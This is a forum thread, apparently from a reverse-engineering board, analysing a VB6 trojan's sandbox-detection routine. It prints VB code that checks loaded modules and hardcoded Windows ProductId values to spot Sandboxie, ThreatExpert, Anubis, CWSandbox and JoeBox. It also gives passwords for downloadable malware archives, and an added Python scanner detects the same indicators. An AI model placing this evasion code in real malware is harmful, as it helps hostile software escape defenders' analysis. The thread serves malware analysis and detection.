
View Full Version : Trojan.Win32.VB.jir - Automated Analysis tools Aware


evilcry
January 27th, 2009, 03:52
Hi,
Joe from JoeBox pointed me to the attached malware, Trojan.Win32.VB.jir, which is written in VB6 and performs some basic checks
for online automated malware analysis tools like:

Code:

Sandboxie
Threat Expert
Anubis
CWSandbox
JoeBox
VM:
VMware Workstation
VirtualPC
VirtualBox


Here is the sandbox detection function:

Code:

Public Function IsInSandbox() As Boolean
    Dim hKey As Long, hOpen As Long, hQuery As Long, hSnapShot As Long
    Dim me32 As MODULEENTRY32
    Dim szBuffer As String * 128

    ' Walk the modules loaded into the current process
    hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, GetCurrentProcessId)

    me32.dwSize = Len(me32)
    Module32First hSnapShot, me32

    Do While Module32Next(hSnapShot, me32) <> 0
        If InStr(1, LCase(me32.szModule), "sbiedll.dll") > 0 Then 'Sandboxie
            IsInSandbox = True
        ElseIf InStr(1, LCase(me32.szModule), "dbghelp.dll") > 0 Then 'ThreatExpert
            IsInSandbox = True
        End If
    Loop

    CloseHandle (hSnapShot)

    ' No module match: compare the Windows ProductId against known sandbox values
    If IsInSandbox = False Then
        hOpen = RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion", 0, KEY_ALL_ACCESS, hKey)
        If hOpen = 0 Then
            hQuery = RegQueryValueEx(hKey, "ProductId", 0, REG_SZ, szBuffer, 128)
            If hQuery = 0 Then
                If InStr(1, szBuffer, "76487-337-8429955-22614") > 0 Then 'Anubis
                    IsInSandbox = True
                ElseIf InStr(1, szBuffer, "76487-644-3177037-23510") > 0 Then 'CWSandbox
                    IsInSandbox = True
                ElseIf InStr(1, szBuffer, "55274-640-2673064-23950") > 0 Then 'JoeBox
                    IsInSandbox = True
                End If
            End If
        End If
        RegCloseKey (hKey)
    End If
End Function


Malware Zip Password: infected

Regards,
Giuseppe 'Evilcry' Bonfa'
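
Added example (not part of the original post and not evilcry's code): a static triage scanner that looks for the module names and ProductId values from the listing above in a file's bytes, in both ASCII and UTF-16LE form, so an analyst can flag sandbox-aware samples before detonation. The `is_sandbox_aware` threshold and the two test buffers are assumptions constructed for illustration.

```python
import re
import sys

# Strings the IsInSandbox listing compares against, mapped to the analysis
# environment each one fingerprints (labels follow the comments in the post).
INDICATORS = {
    "sbiedll.dll": "Sandboxie (loaded module)",
    "dbghelp.dll": "ThreatExpert (loaded module)",
    "76487-337-8429955-22614": "Anubis (ProductId)",
    "76487-644-3177037-23510": "CWSandbox (ProductId)",
    "55274-640-2673064-23950": "JoeBox (ProductId)",
}

def _patterns(text):
    """Case-insensitive byte regexes for the ASCII and UTF-16LE forms of text."""
    forms = (text.encode("ascii"), text.encode("utf-16-le"))
    return [re.compile(re.escape(f), re.IGNORECASE) for f in forms]

def scan(data):
    """Return {indicator: sorted offsets} for each indicator present in data."""
    hits = {}
    for text in INDICATORS:
        offsets = sorted(m.start() for p in _patterns(text) for m in p.finditer(data))
        if offsets:
            hits[text] = offsets
    return hits

def is_sandbox_aware(hits):
    """Assumed triage rule: any sandbox ProductId, or two or more indicators.
    A lone dbghelp.dll reference is common in benign software."""
    return any(t[0].isdigit() for t in hits) or len(hits) >= 2

# Constructed buffers, not real samples. VB6 keeps string literals as UTF-16LE.
SAMPLE = (b"MZ" + b"\x00" * 30
          + "SbieDll.dll".encode("utf-16-le") + b"\x00\x00"
          + "76487-337-8429955-22614".encode("utf-16-le"))
BENIGN = b"MZ" + b"\x00" * 30 + b"DBGHELP.DLL\x00"

if __name__ == "__main__":
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            hits = scan(fh.read())
        verdict = "sandbox-aware" if is_sandbox_aware(hits) else "no match"
        print(f"{path}: {verdict}")
        for text, offsets in hits.items():
            print(f"  {INDICATORS[text]}: {text!r} at {offsets}")
```

A packed or string-encrypted sample will not match, so a clean result only means these literals are not stored in the clear.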

evaluator
January 27th, 2009, 10:37
Seems the same is in this torrent.

password: MALWARE

coder_gate
July 22nd, 2009, 09:29
thank you....

nEINEI
September 18th, 2009, 22:56
MALWARE.rar (24.5 KB)
psw is error ?

Kayaker
September 19th, 2009, 00:10
You mean password? No, the password MALWARE works.